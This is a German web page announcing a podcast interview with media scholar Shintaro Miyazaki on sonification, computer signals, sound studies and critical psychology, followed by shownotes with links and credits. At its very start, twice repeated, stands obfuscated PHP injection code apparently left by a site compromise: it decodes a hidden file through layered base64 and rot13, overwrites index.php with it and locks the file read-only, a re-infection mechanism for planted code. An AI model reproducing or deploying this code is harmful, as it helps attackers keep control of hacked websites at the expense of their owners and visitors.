$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Algorhythmik und Medienkritik. Shintaro Miyazaki über Computersignale, Verflechtung von Klang, Macht und Signalverarbeitung – Auditive Medienkulturen

Algorhythmik und Medienkritik. Shintaro Miyazaki über Computersignale, Verflechtung von Klang, Macht und Signalverarbeitung

Shintaro Miyazaki, Juniorprofessor für digitale Medien und Computation an der Humboldt-Universität zu Berlin, berichtet im Gespräch über Sonifikation als diagnostische Praxis in der frühen Computergeschichte, das Klangwissen von Computeringenieuren, Kritische Psychologie, Wegbereiter der zeitgenössischen Sound Studies und die notwendige Politisierung der Klangforschung.


Shownotes

Shintaros Profil am Fachgebiet Medienwissenschaft der Humboldt-Universität zu Berlin:
https://medienwissenschaft-berlin.de/leute/miyazaki-shintaro/

Die publizierte Dissertation von Shintaro Miyazaki: Algorhythmisiert. Eine Medienarchäologie digitaler Signale und (un)erhörter Zeiteffekte bei Kadmos, inkl. Hörbeispielen:
https://www.kulturverlag-kadmos.de/programm/details/algorhythmisiert

Shintaro Miyazaki über „Algorhythmische Ökosysteme“ im open access-Sammelband Algorithmuskulturen:
https://library.oapen.org/bitstream/id/54873d46-1b2a-411d-9c82-8a3419cd793f/645219.pdf

Die Buchreihe Sound Studies bei Transcript:
https://www.transcript-verlag.de/reihen/musikwissenschaft/sound-studies/?f=12320

Rezension zu Maren Haffkes publizierter Dissertation zur Archäologie der Tastatur:
https://muse.jhu.edu/article/751123/pdf

Der M.A. Studiengang „Sound Studies“ an der Berliner UdK:
https://www.udk-berlin.de/studium/sound-studies-master-of-arts/

Kritische Psychologie: „Psychologie meets Marxismus, aber ohne Lacan“ (Miyazaki) – Wikipedia-Artikel:
https://de.wikipedia.org/wiki/Kritische_Psychologie

Clicks & Cuts – Wikipedia-Artikel:
https://de.wikipedia.org/wiki/Clicks_%26_Cuts 

Shintaro Miyazaki zu Counter-Dancing:
https://www.degruyter.com/document/doi/10.1515/9783035622164-023/html

Shintaro Miyazaki über „Musik für Maschinen?! – Wo sich die Wissenschaft der Medien, des Computers und der Musik treffen und wie sie zusammenarbeiten könnten“:
https://doi.org/10.25366/2020.105 


Credits

Interview: Christoph Borbach
Sounddesign:Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)